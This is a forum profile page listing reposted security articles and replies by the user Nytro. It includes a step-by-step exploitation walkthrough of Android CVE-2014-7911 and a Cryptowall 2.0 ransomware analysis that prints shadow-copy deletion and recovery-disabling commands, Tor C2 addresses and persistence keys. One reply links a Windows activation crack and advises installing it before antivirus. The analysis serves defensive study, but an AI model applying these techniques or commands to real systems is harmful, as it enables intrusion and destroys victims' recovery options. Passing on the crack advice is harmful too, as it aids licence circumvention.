Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. Nytro

    pyxswf

    pyxswf pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may be embedded in files such as MS Office documents (e.g. Word, Excel), which is especially useful for malware analysis. It is part of the python-oletools package. pyxswf is an extension to xxxswf.py published by Alexander Hanel. Compared to xxxswf, it can extract streams from MS Office documents by parsing their OLE structure properly, which is necessary when streams are fragmented. Stream fragmentation is a known obfuscation technique, as explained on Ixia It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option). For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files. Usage Usage: pyxswf.py [options] <file.bad> Options: -o, --ole Parse an OLE file (e.g. Word, Excel) to look for SWF in each stream -f, --rtf Parse an RTF file to look for SWF in each embedded object -x, --extract Extracts the embedded SWF(s), names it MD5HASH.swf & saves it in the working dir. No addition args needed -h, --help show this help message and exit -y, --yara Scans the SWF(s) with yara. If the SWF(s) is compressed it will be deflated. No addition args needed -s, --md5scan Scans the SWF(s) for MD5 signatures. Please see func checkMD5 to define hashes. No addition args needed -H, --header Displays the SWFs file header. No addition args needed -d, --decompress Deflates compressed SWFS(s) -r PATH, --recdir=PATH Will recursively scan a directory for files that contain SWFs. Must provide path in quotes -c, --compress Compresses the SWF using Zlib Example 1 - detecting and extracting a SWF file from a Word document on Windows: C:\oletools>pyxswf.py -o word_flash.doc OLE stream: 'Contents' [sUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents [ADDR] SWF 1 at 0x8 - FWS Header C:\oletools>pyxswf.py -xo word_flash.doc OLE stream: 'Contents' [sUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents [ADDR] SWF 1 at 0x8 - FWS Header [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf Example 2 - detecting and extracting a SWF file from a RTF document on Windows: C:\oletools>pyxswf.py -xf "rtf_flash.rtf" RTF embedded object size 1498557 at index 000036DD [sUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0 00036DD [ADDR] SWF 1 at 0xc40 - FWS Header [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf How to use pyxswf in Python applications TODO python-oletools documentation Home License Install Contribute, Suggest Improvements or Report Issues Tools: olebrowse oleid olemeta oletimes olevba pyxswf rtfobj Sursa: https://bitbucket.org/decalage/oletools/wiki/pyxswf
      • 1
      • Upvote
  2. CVE-2014-7911 – A Deep Dive Analysis of Android System Service Vulnerability and Exploitation posted by: Yaron Lavi and Nadav Markus on January 6, 2015 6:00 AM In this post we discuss CVE-2014-7911 and the various techniques that can be used to achieve privilege escalation. We also examine how some of these techniques can be blocked using several security mechanisms. The Vulnerability CVE-2014-7911 was presented here along with a very descriptive POC that was written by Jann Horn. Described briefly, the ObjectInputStream doesn’t validate that the serialized object’s class type, as described in the serialized object, is actually serializable. It creates an instance of the wanted class anyway with the deserialized values of the object. Therefore, one can create object of any class, and control its private variables, by serializing objects from another class, that would be deserialized as data members of the wanted class. Let’s look at the example below: The following snippet (copied from the original POC) shows a spoofed BinderProxy instance: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 9 [/TD] [TD=class: crayon-code]package AAdroid.os; import java.io.Serializable; public class BinderProxy implements Serializable { private static final long serialVersionUID = 0; public long mObject = 0x1337beef; public long mOrgue = 0x1337beef; }[/TD] [/TR] [/TABLE] In the POC code that was provided above, an attacker serializes a class named AAdroid.os.BinderProxy and changes its name to android.os.BinderProxy after marshalling it, and before sending it to the system server. android.os.BinderProxy class isn’t serializable, and it involves native code that handles mObject and mOrgue as pointers. If it was serializable, then the pointers valued wouldn’t be deserialized, but their dereferenced values would. The deserialization code in ObjectInputStream deserializes the sent object as an android.os.BinderProxy instance, leading to type confusion. As mentioned earlier, this type confusion results in the native code reading pointer values from the attacker’s spoofed android.os.BinderProxy, supposedly private fields, which the attacker modified. Specifically, the field of interest is mOrgue. The android.os.BinderProxy contains a finalize method that will result in native code invocation. This native code uses mOrgue as a pointer. This is the finalize method: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 9 [/TD] [TD=class: crayon-code]protected void finalize() throws Throwable { destroy(); super.finalize(); return; Exception exception; exception; super.finalize(); throw exception; }[/TD] [/TR] [/TABLE] And this is the declaration of destroy: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]private final native void destroy();[/TD] [/TR] [/TABLE] The native destroy function: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 9 10 11 12 13 [/TD] [TD=class: crayon-code]static void android_os_BinderProxy_destroy(JNIEnv* env, jobject obj) { IBinder* b = (IBinder*) env->GetIntField(obj, gBinderProxyOffsets.mObject); DeathRecipientList* drl = (DeathRecipientList*) env->GetIntField(obj, gBinderProxyOffsets.mOrgue); LOGDEATH("Destroying BinderProxy %p: binder=%p drl=%p\n", obj, b, drl); env->SetIntField(obj, gBinderProxyOffsets.mObject, 0); env->SetIntField(obj, gBinderProxyOffsets.mOrgue, 0); drl->decStrong((void*)javaObjectForIBinder); b->decStrong((void*)javaObjectForIBinder); IPCThreadState::self()->flushCommands(); }[/TD] [/TR] [/TABLE] Eventually, the native code invokes decStrong (i.e., in drl->decStrong((void*)javaObjectForIBinder) Note that at this point, drl is controlled by an attacker, as evident by the line [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 [/TD] [TD=class: crayon-code]DeathRecipientList* drl = (DeathRecipientList*) env->GetIntField(obj, gBinderProxyOffsets.mOrgue);[/TD] [/TR] [/TABLE] So decStrong is going to be called with us controlling ‘this’ pointer. Let’s take a look on decStrong code from RefBase class source: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [/TD] [TD=class: crayon-code]void RefBase::decStrong(const void* id) const { weakref_impl* const refs = mRefs; refs->removeStrongRef(id); const int32_t c = android_atomic_dec(&refs->mStrong); #if PRINT_REFS ALOGD("decStrong of %p from %p: cnt=%d\n", this, id, c); #endif ALOG_ASSERT(c >= 1, "decStrong() called on %p too many times", refs); if (c == 1) { refs->mBase->onLastStrongRef(id); if ((refs->mFlags&OBJECT_LIFETIME_MASK) == OBJECT_LIFETIME_STRONG) { delete this; } } refs->decWeak(id); }[/TD] [/TR] [/TABLE] Note the line refs->mBase->onLastStrongRef(id); These lines will eventually lead to arbitrary code execution. In the following screenshot of RefBase::decStrong assembly, the attacker controls r0(‘this pointer’) Exploitation The first use of the controlled register r0, which contains the ‘this’ pointer (drl) is in these lines: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 [/TD] [TD=class: crayon-code]weakref_impl* const refs = mRefs; refs->removeStrongRef(id); const int32_t c = android_atomic_dec(&refs->mStrong);[/TD] [/TR] [/TABLE] These lines are translated to the following assembly: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 [/TD] [TD=class: crayon-code]ldr r4, [r0, #4] # attacker controls r4 mov r6, r1 mov r0, r4 blx <android_atomic_dec ()>[/TD] [/TR] [/TABLE] First, r4 is loaded with the mRefs variable. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]ldr r4, [r0, #4] # attacker controls r4[/TD] [/TR] [/TABLE] Note that r0 is the ‘this’ pointer of the drl, and mRefs is the first private variable following the virtual function table, hence it is 4 bytes after ‘this’ pointer. Then, android_atomic_dec is being called with &refs->mStrong [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code] const int32_t c = android_atomic_dec(&refs->mStrong);[/TD] [/TR] [/TABLE] This is translated to: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 [/TD] [TD=class: crayon-code]mov r0, r4 blx <android_atomic_dec ()>[/TD] [/TR] [/TABLE] r0 now contains &refs->mStrong. Note that the mStrong variable is the first data member of refs (in the class weakref_impl), and that this class contains no virtual functions, hence it does not contain a vtable, so the mStrong variable is at offset 0 of r4. As one can tell – the line refs->removeStrongRef(id); is not present in the assembly simply because the compiler optimized and omitted it, since it has an empty implementation, as one can see from the following code: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]void removeStrongRef(const void* /*id*/) { }[/TD] [/TR] [/TABLE] Following the call to android_atomic_dec are these lines of code: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 [/TD] [TD=class: crayon-code]if (c == 1) { refs->mBase->onLastStrongRef(id);[/TD] [/TR] [/TABLE] These are translated to the following assembly lines: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 [/TD] [TD=class: crayon-code]cmp r0, #1 bne.n d1ea ldr r0, [r4, #8] mov r1, r6 ldr r3, [r0, #0] ldr r2, [r3, #12] blx r2 [/TD] [/TR] [/TABLE] Note that android_atomic_dec returns the value of the specified memory address before the decrement took place. So in order to invoke refs->mBase->onLastStrongRef(id) (blx r2), we must get refs->mStrong to get the value of 1. As we can see up to now, an attacker has several constraints that he must adhere to if he wishes to gain code execution: drl (our first controlled pointer, i.e. r0 when entering decStrong) must point to a readable memory location. refs->mStrong must have the value of 1 The dereference chain at the line refs->mBase->onLastStrongRef(id) must succeed and eventually point to an executable address. In addition, an attacker must overcome the usual obstacles of exploitation – ASLR and DEP. One can employ basic techniques to fulfill these requirements and overcome the mentioned security mechanisms, including heap spraying, stack pivoting and ROP. Let’s look at these in detail. Heap spray An attacker’s first step will be to get a reliable readable address with arbitrary data – most commonly achieved by a heap spray. The system server provides several core functionalities for the android device, many of which are exposed to applications via various service interfaces. A common paradigm to invoke a service in the context of the system server is like the following: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]LocationManager lm = (LocationManager)getSystemService(LOCATION_SERVICE);[/TD] [/TR] [/TABLE] The acquired manager allows us to invoke functionality in the system server on behalf of us, via IPC. Several services can be used by us for a heap spray, but for the purpose of this blog, we decided to use a heap spray that requires special app permissions, to prevent normal applications from utilizing this technique. The location manager allows us to register test providers via the function addTestProvider – allowing us to pass an arbitrary name that contains arbitrary data. As we mentioned, one should enable developer options and enable the mock locations option in order to utilize this. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]lm.addTestProvider(builder.toString(), false, false, false, false, false, false, false, 1, 1);[/TD] [/TR] [/TABLE] Note that this heap spray does have its limitations – the data is sprayed using the name field, which is Unicode. This imposes a limitation – we are limited to byte sequences which correspond to valid Unicode code points. Spray addresses manipulation After spraying the system server process memory address space, we encountered another issue – our chosen static address indeed pointed to readable data on each run, but not to the exact same offset in the spray chunk each time. We decided to solve this problem by crafting a special spray that contains decreasing pointer values. Here is an illustration of the sprayed buffer, followed by an explanation of its structure: STATIC_ADDRESS is the arbitrarily chosen static pointer in mOrgue. GADGET_BUFFER_OFFSET is the offset of GADGET_BUFFER from the beginning of the spray. In each run of system server process, the static address we chose points to our controlled data, but with different offsets. r0 (which always hold the same chosen STATIC_ADDRESS) can fall to any offset in the “Relative Address Chunk”, therefore point to any of the STATIC_ADDRESS + GADGET_BUFFER_OFFSET – 4N addresses, on each time. Note the following equation: GADGET_BUFFER = Beginning_of_spray + GADGET_BUFFER_OFFSET In the case that r0 (=STATIC_ADDRESS) points to the beginning of the spray : STATIC_ADDRESS = Beginning_of_spray. Hence: GADGET_BUFFER = STATIC_ADDRESS + GADGET_BUFFER_OFFSET On any other case – r0(=STATIC_ADDRESS) points to an offset inside the spray (the offset is dword aligned): STATIC_ADDRESS = Beginning_of_spray + 4N Beginning_of_spray = STATIC_ADDRESS – 4N. Hence: GADGET_BUFFER = STATIC_ADDRESS + GADGET_BUFFER_OFFSET – 4N The higher offset in the chunk that r0(=STATIC_ADDRESS) points to, the more we have to subtract to make the expression: STATIC_ADDRESS + GADGET_BUFFER_OFFSET – 4N points to GADGET_BUFFER. No matter to which offset in the chunk r0 points to, dereference it would give us the current address of GADGET_BUFFER. But where do we get if we dereference the other addresses in the chunk? As farther as we go above r0, the farther the dereference would bring us below GADGET_BUFFER. Now that we have a valid working spray, let’s go back to analyzing the assembly. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 [/TD] [TD=class: crayon-code]ldr r4, [r0, #4] mov r0, r4 blx <android_atomic_dec ()> cmp r0, #1[/TD] [/TR] [/TABLE] So to overcome the second constraint – in which refs->mStrong must contain 1 [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]ldr r4, [r0, #4] --> r4=[sTATIC_ADDRESS + 4] --> r4 = GADGET_BUFFER-4[/TD] [/TR] [/TABLE] [r4] should contain 1, hence [GADGET_BUFFER – 4] should contains 1. Now, after atomic_dec return value is indeed 1, we should overcome the other dereferences to get to the blx opcode. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 9 [/TD] [TD=class: crayon-code]cmp r0, #1 bne.n d1ea r4=GADGET_BUFFER - 4 ldr r0, [r4, #8] r0 = [GADGET_BUFFER - 4 + 8] <-> r0 = [GADGET_BUFFER + 4] mov r1, r6 ldr r3, [r0, #0] r3 = [[GADGET_BUFFER + 4] + 0] <-> r3 = [[GADGET_BUFFER + 4]][/TD] [/TR] [/TABLE] Note in order to succeed with this dereference, [GADGET_BUFFER + 4] should contain a KNOWN valid address. We arbitrarily chose the known address – STATIC_ADDRESS. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 [/TD] [TD=class: crayon-code]ldr r2, [r3, #12] r2 = [GADGET_BUFFER + 12] blx r2[/TD] [/TR] [/TABLE] So now we can build the GADGET_BUFFER as following: ROP CHAIN We chose to run the “system” function with a predefined command line. In order to control the r0 register, and make it point to the command line string, we should use some gadgets that would manipulate the registers. We got only one function call, so to take control on the execution flow with our gadgets, we should use a stack pivot gadget. Therefore, the first function pointer is the preparations for the stack pivot gadget: Where r5 equals to the original r0 (STATIC_ADDRESS) as one can see at the beginning of decStrong. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 [/TD] [TD=class: crayon-code]mov r0,r5 - Restoring r0 to its original value. ldr r7, [r5] r7 = [r5] r7=[sTATIC_ADDRESS] r7 = GADGET_BUFFER ldr r2, [r7,#0x54] r2 = [r7 + 0x54] r2 = [GADGET_BUFFER + 84] blx r2[/TD] [/TR] [/TABLE] Call to the next gadget – which should be 21(=0x54 / 4) dwords from the beginning of GADGET_BUFFER This gadget does the Stack Pivoting. SP register points to r7 – therefore the stack is under our control and points to GADGET_BUFFER. Ret to the next gadget that should be kept 8 dwords from the beginning of GADGET_BUFFER (Note the pop {r4-r11,pc} instruction, which pops 8 registers off the stack before popping pc). [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]r0 = [r0 + 0x38] r0 = GADGET_BUFFER - 0x38 (As explained before about the spray)[/TD] [/TR] [/TABLE] Now r0 points to 56 (0x38) bytes before GADGET_BUFFER, so we have 52 command line chars, excluding the “1” for atomic_dec. Ret to the next gadget that should be kept 10 dwords from the beginning of GADGET_BUFFER (2 dwords after the current gadget – pop {r3,pc}) That is the last gadget where we call system! Here is an updated layout of the memory for this to happen: Android and ARM There are two important issues we should keep in mind when choosing the gadgets addresses. There is an ASLR mechanism on Android, and the addresses wouldn’t be the same on each and every time. In order to know the correct address, we use the fact that both system server process, and our app are forked from the same process – ZYGOTE, meaning we share the same modules. So we get the address of the necessary modules in system server process, by parsing the maps file of our process. ‘maps’ is a file in /proc/<pid>/maps which contains the memory layout and the loaded modules addresses. On ARM CPU, there are two modes of opcode parsing: ARM (4 bytes per opcode) and THUMB (variable bytes per opcode – 2 or 4). Meaning that the same address pointed by PC, could be parsed differently by the cpu when running in different modes. Parts of the gadgets we use are in the THUMB mode. In order to make the processor change its mode when parsing those gadgets, we change the pointer address from the actual address, to (address & 1) – turning on the LSB, which make the cpu jmp to the correct address with THUMB mode. PAYLOAD As described before, we use the “system” function to run our command line. The length of the command line is limited, and actually a command line can’t be used for every purpose. So we decided to use a pre compiled elf, that being written to the file system, as an asset of our app. This elf can do anything with uid 1000 (the uid of system server). The command line we send as an argument to system is simply – “sh -c ” + file_path CONCLUSION Android has some common security mechanisms such as ASLR and DEP which should make an exploitation of vulnerability harder to achieve. Moreover, every application runs in its own process, so the IPC communication could be validated, and making guesses on memory layout shouldn’t be intuitive. On the other hand, the fact that every process is forked from the same process makes ASLR irrelevant for vulnerabilities within zygote’s sons and the binder connection from every process to system server could lead to heap spray as seen on this post. Those issues appear to be inherent in the Android OS design. Palo Alto Networks has been researching an Android security solution that based on our lab testing would have blocked this exploit (as well as other exploits) with multiple exploit mitigation modules. We hope to share more details in the coming months. Sursa: CVE-2014-7911 – A Deep Dive Analysis of Android System Service Vulnerability and Exploitation - Palo Alto Networks BlogPalo Alto Networks Blog
  3. Ransomware on Steroids: Cryptowall 2.0 Talos Group | January 6, 2015 at 7:14 am PST This post was authored by Andrea Allievi and Earl Carter. Ransomware holds a user’s data hostage. The latest ransomware variants encrypt the user’s data, thus making it unusable until a ransom is paid to retrieve the decryption key. The latest Cryptowall 2.0, utilizes TOR to obfuscate the command and control channel. The dropper utilizes multiple exploits to gain initial access and incorporates anti-vm and anti-emulation checks to hamper identification via sandboxes. The dropper and downloaded Cryptowall binary actually incorporate multiple levels of encryption. One of the most interesting aspects of this malware sample, however, is its capability to run 64 bit code directly from its 32 bit dropper. Under the Windows 32-bit on Windows 64-bit (WOW64) environment, it is indeed able to switch the processor execution context from 32 bit to 64 bit. Initial Compromise Cryptowall 2.0 can be delivered through multiple attack vectors, including email attachments, malicious pdf files and even various exploit kits. In the sample that we analyzed, the dropper utilized CVE-2013-3660, “Win32k.sys Elevation of Privilege Vulnerability” to achieve the initial privilege escalation on X86 based machines. This exploit works on 32 bit OSs starting beginning with Vista. The dropper even includes a 64-bit DLL that is able to trigger the exploit in all the vulnerable AMD64 Windows Systems. Provided the anti-VM and anti-emulation checks pass, the Cryptowall malware is decrypted and installed on the system. Once the system is infected, the user is presented a message similar to Figure 1. Figure 1. (Click to Enlarge) Constructing the Unencrypted Cryptowall Binary To construct the unencrypted Cryptowall 2.0 code, the dropper goes through multiple stages of decryption. The main dropper is a C++ MFC application. The first-stage decryption code is located at “CMainFrame::OnCreate” in the MFC event handler. The handler builds the first-stage decryption code (at RVA +0xF3F0) and simple calls it. The first-stage decryption code opens the original dropper PE, reads from it, and decrypts a big chunk of code (second-stage). Finally it transfer the execution to the second-stage located in the external buffer. The Second stage is the last encryption layer code. It builds a simple Import Address Table (IAT), and implements multiple features. The most important one is the Anti-VM Check. The Anti-VM code is quite simple: Figure 2: The CryptoWall simple Anti-VM check code. (Click to Enlarge.) If no VM is detected, another “dropper“ process is spawned in a suspended state. The “ZwUnmapViewOfSection” API is used to unmap the original PE buffer. A new memory chunk is allocated and a new PE (extracted and decrypted from the “.data” section) is copied into its preferred base address. Then a new thread process is resumed with the following new context and the original process terminates: EAX register is set to the new PE entry point address; EBX register is set to a still unknown value: 7ffd8008 Installing Cryptowall on System The “VirusExplorerMain” routine in the faked “explorer” process constructs the IAT and installs CryptoWall on the victim system. The first step is to create an executable with the name based on the computer’s MD5 hash. This executable is copied to the location specified by the “%APPDATA%” environment variable (“C:\Users\<Username>\AppData\Roaming”). To maintain persistence, an auto-start registry value is added in: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Note: The RunOnce value is preceded by a so that the process starts even in Safe Mode. The same random executable is copied to the “Startup” folder of the Start Menu. The last duty of the faked “explorer” process is to disable all system protections. The following shell commands are executed: vssadmin.exe Delete Shadows /All /Quiet bcdedit.exe /set {default} recoveryenabled No bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures The following services are also disabled: Security Center, Windows Defender, Windows Update, Background Intelligent Transfer Service, ERSvc, Windows Error Reporting Service. Finally, the original dropper file is terminated and the file is deleted. The Cryptowall PE is now injected into a faked “Svchost” process in the same way as the fake “explorer” process was created initially. The infection now continues in the faked “svchost” process. The “VirusSvchostMain” function (RVA 0x418C70) is the main infection routine. It constructs the virus IAT (importing functions from the following modules: ntdll, kernel32, advapi32, user32, wininet, ole32, gdi32), checks whether the installation is done, and creates the main Cryptowall event. It then creates the main Cryptowall Thread and tries to download the TOR client used for communication from one of the following URLs: If it succeeds in downloading the update file, it executes directly. The downloaded binary is an executable that is encrypted 3 times with a simple algorithm. After decryption, a clean PE file is extracted and launched. This PE file is peculiar because it has all its normal headers (DOS header, NT header, IAT, EAT, …) stripped. Its IAT and “.data” section reside in another big memory buffer. The decryption code deals with the correct linking and relocation. This clean PE is actually the Cryptowall TOR communication module. It implements a complete TOR Client that it utilizes for Command & Control communication. The TOR URLs used by the sample we analyzed were: crptarv4hcu24ijv.onion crptbfoi5i54ubez.onion crptcj7wd4oaafdl.onion Using hardcoded IP address in the PE, the malware connects to the TOR Server with an encrypted SSL connection on port 443 or 9090. After successfully connecting, it starts to generate the Cryptowall domain names using a customized Domain Generation Algorithm (DGA). The algorithm is located at offset + 0x2E9FC. Figure 3: The code of the DGA algorithm in the TOR client If the encrypted connection goes well, the communication with the Cryptowall Command & Control server will take places; otherwise the main thread sleeps for a random number of seconds and then retries with a new generated server name. Each of the many SSL connections Cryptowall 2.0 establishes uses random server names in the certificates. However, the client certificates share commonalities that are unique enough to make it possible to detect these client connections outbound. Cryptowall 2.0 makes many, many requests once installed. Initially Cryptowall 2.0 attempts to idenitfy the outside address for the network the system is operating on using the “GetExternalIpAddr” function. It accomplishes this by communicating with one of the following addresses: http://wtfismyip.com/text http://ip-addr.es http://myexternalip.com/raw http://curlmyip.com It starts with wtfismyip.com and stops after the first successful reply is received. In most situations, this means that it will end up only going to wtfismyip.com (since it is the first entry in the list). Although this is a fairly generic request, this shouldn’t be a very common occurrence in an enterprise network and can serve as a potential network indicator of this malware. Another interesting aspect of the sample that we analyzed is that includes some 64 bit code (and an exploit DLL) directly in its main 32-bit executable. Although the main module is running in 32-bit mode, it is capable of executing all the 64-bit functions it needs. It accomplishes this by performing a direct Processor execution context switch. The code pushes two 32-bit values on the stack: the target offset (only the low part) of the 64-bit function offset and a 64-bit selector. push <32Bit Selector> push <32Bit Low DWORD address> retf It finally performs a FAR RET (opcode 0xCB). As the Intel manuals say, this kind of opcode executes a “Far return”: a return to a calling procedure located in a different segment than the current code segment. The target code segment is a 64-bit one, and as result the processor switches the execution context. To return to 32-bit mode the code reverses this process: call $+5 ; This will push the 64-bit return address on the stack mov dword ptr [esp+4], <32Bit Selector> ; The same as PUSH <32bit value>, keep in mind mov dword ptr [esp], <32Bit Address> ; that all values are 8 byte wide in AMD64 mode retf This mixing between 64-bit code and the 32-bit main executable is even difficult for IDA to disassemble. FIgure 2 shows a dump of a Windows 7/8 64 bit Global Descriptor Table (GDT): Figure 4: A dump of the Global Descriptor Table of a 64-bit System As the reader can see, the descriptor 0x20 and the descriptor 0x30 are the Ring 3 code segments that describe the entire user-mode address space, one for 32 bit and one for 64 bit. Cryptowall utilizes the proper selectors for these two segment descriptors and switches between these the two execution modes during its operation. We were able to reverse this process and reconstruct the assembly language code (shown in Figure 3) that performs this switching between 32 & 64 bit by pushing the correct value before executing the far return instruction. Figure 5: Switching Between 32 & 64 bit Modes. (Click to Enlarge) Summary Ransomware is a growing threat to computer users. Variants continue to evolve in functionality and evasive capability. Just getting these complex samples to run in a sandbox can be challenging, making analysis more complicated and involved. Constant research is necessary to develop updated signatures and rules to combat these constant attacks. Identifying and stopping these new complex variants requires a layered security approach. Breaking any step in the attack chain will successfully prevent this attack. Therefore, blocking the initial phishing emails, blocking network connections to known malicious content, as well as stopping malicious process activity are critical to combating ransomware and preventing it from holding your data hostage. Protecting Users Against These Threats Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. CWS or WSA web scanning prevents access to malicious websites, including the downloading of the malware downloaded during these attacks. The Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors. ESA can block phishing emails sent by threat actors as part of this attack. Sursa: Ransomware on Steroids: Cryptowall 2.0
  4. E perfect, exact ce aveai nevoie. Cat ai dat pe el? Mai mult de 200?
  5. Uploadeaza undeva soft-ul si da-ne link. O sa ma uit putin peste el, dar nu promit nimic. Nu ai gasit nimic interesant: https://www.google.ro/search?q=c%2B%2B+magnetic+stripe+reader+usb&ie=utf-8&oe=utf-8&gws_rd=cr ?
  6. MSR Reader-ul ala nu are si o aplicatie ceva? De facut, daca nu are documentatie, o sa fie greu. Daca e conectat pe USB, cauta un USB sniffer. Daca e pe port serial, un serial sniffer, ar trebui sa existe. Vezi ce pachete se trimit/primesc si poate iti dai seama cum functioneaza, cel putin partial. Edit: Am gasit asta: http://www.cardcolor.ro/cititoare/encoder-magnetic-msr-606 1x Encoder magnetic MSR606 1x CD(Manual utilizare, Driver USB, Software encodare) 1x A/C Adapter(100-240V, with plug for worldwide use: US, AU, UK or Europe) 1x Card curatare Cel mai probabil acel soft e pentru Windows si nu e open source. Vad ca e nevoie de un driver, sper sa nu ai probleme din cauza asta. Poti incerca sa faci reverse engineering la un nivel minimal, nu stiu... Daca ai noroc si e scris in .NET si neobfuscat, te-ai scos. Oricum, limbajul in care faci programul e irelevant, poate sa fie orice. Si ca tot veni vorba, ce vrei sa faci cu el mai exact?
  7. NU luati de pe site-uri ca: download.windows7loadernew.com , download.windowsloaderdaz.com , dazloader.com ! Eu am folosit acasa: Zippyshare.com - Windows Loader v2 2 2 by Daz.zip Virustotal: https://www.virustotal.com/en/file/2f2aba1e074f5f4baa08b524875461889f8f04d4ffc43972ac212e286022ab94/analysis/1420535361/ (detectat ca HackTool, Crack, Keygen) Recomand totusi SURSA, cum a mentionat spider: Windows Loader - Support and chat - Page 1886 Nota: Instalati loader inainte de a instala antivirus, desi va supuneti la riscuri. Scanati pe virustotal. Daca instalati mai intai antivirus, va puteti alege cu MBR (master boot record) corupt si nu mai puteti boota.
  8. Aveti grija de unde descarcati Windows 7 Loader, eu am gasit si versiune cu Adware...
  9. This tool, developed in 2010 by Justin Collins (@presidentbeef) is specifically for finding vulnerabilities and security issues in Ruby on Rails apps at any development stage. Brakeman is used by the likes of Twitter (where Justin is employed), GitHub, and Groupon to look for vulnerabilities. Justin gave a talk at RailsConf 2012 that’s worth watching describing the value of using SCA early on and how Brakeman accomplishes that. The Good: Easy setup and configuration and fast scans. Because it’s specifically built for Ruby on Rails apps, it does a great job at checking configuration settings for best practices. With the ability to check only certain subsets, each code analysis is able to be customizable to specific issues. The developer has been maintaining and updating the tool on a regular basis since its first release. The Not-So-Good: Because of its suspicious nature, the tool can show a high rate of false positives As written on the tool’s FAQ page, just because a report shows zero warnings doesn’t mean your application is flaw-free; “There may be vulnerabilities Brakeman does not test for or did not discover. No security tool has 100% coverage.” Sursa: Brakeman - Rails Security Scanner
      • 1
      • Upvote
  10. This tool, available under a GNU General Public License, was developed to check non-standard code that compilers would normally not detect. Created by Daniel Marjamäki, CPPCheck offers a command line mode as well as a GUI mode and has a number of possibilities for environment integration. The Good: Plugins and integrations for a number of IDEs: Eclipse, Hudson, Jenkins, Visual Studio. Daniel’s plan is to release a new version every other month or so, and he’s been keeping up with that goal. Available in many world languages, including English, Dutch, Finnish, Swedish, German, Russian, Serbian and Japanese. The Not-As-Good: Doesn’t detect a large number of bugs (as with most of the other tools) Customization requires good deal of effort Results take longer than other tools Sursa: cppcheck | SourceForge.net
  11. Designed to be simple and easy to use, FlawFinder reports well-known security issues in applications written in C, sorted by risk level. Developed by open-source and secure software expert David Wheeler, the tool itself is written in Python and uses a command line interface. FlawFinder is officially CWE compatible. The Good: Ability to check only the changes made to code for faster, more accurate results Long history, released in 2001 with consistent updates The Not-As-Good: A number of false positives Requires Python 1.5 Sursa: Flawfinder Home Page
  12. Created by ethical hacker Ryan Dewhurst (@ethicalhack3r) for his undergraduate thesis, DevBug is a very simple online PHP static code analysis tool. Written in JavaScript, it was designed to make SCA easy and pulls inspiration (as well as Taint Analysis data) from RIPS. The Good: Easy to use with instant results Nice use of OWASP wiki page links for more info on any found vulnerability The Not-As-Good: Simplistic and is only meant for light analysis Sursa: http://www.devbug.co.uk/
  13. he tool, which names stands for Lightweight Analysis for Program Security in Eclipse, is an OWASP security scanner, developed as an Eclipse plugin, which detects vulnerabilities in Java EE Applications. LAPSE+ is liscenced under the GNU General Public License v.3 and was originally developed by Stanford University. The Good: Tests validation logic without compiling your code Offers results as three steps: Vulnerability Source, Vulnerability Sink and Provenance Tracker The Not-As-Good: Doesn’t identify compilation errors Limited to Eclipse IDE’s only Project was taken over in early 2014 but no new version since 2012 Sursa: https://www.owasp.org/index.php/OWASP_LAPSE_Project
